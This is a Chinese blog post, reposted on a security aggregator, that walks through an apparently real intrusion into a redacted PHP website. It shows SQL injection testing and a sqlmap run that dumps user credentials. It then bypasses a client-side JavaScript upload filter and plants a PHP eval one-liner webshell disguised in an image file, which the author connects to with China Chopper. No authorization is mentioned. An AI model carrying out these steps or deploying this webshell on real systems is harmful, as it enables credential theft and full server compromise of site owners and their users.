记录一次实战,注入+本地JS绕过拿shell

admin 2022年10月24日08:56:27记录一次实战,注入+本地JS绕过拿shell已关闭评论43 views字数 698阅读2分19秒阅读模式

1.找注入点

图片


2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显

图片

输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2,没有回显
说明存在注入。

3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”

图片

发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。

图片

我们先上传一个脚本木马试试。

图片

发现有黑名单。先看下是否是本地js校验。右键
——审查元素,发现是本地js校验。

图片

我们找到表单form,删除相对应的脚本。

图片

5.重新上传php一句话,发现

图片

那么试下图片马

6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>

图片

图片

保存,命名为a.php。
然后上传,发现上传成功,使用菜刀连接,密码pw。

图片


作者:Randmancy文章来源:https://blog.csdn.net/qq_34341458

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月24日08:56:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记录一次实战,注入+本地JS绕过拿shellhttp://cn-sec.com/archives/1366964.html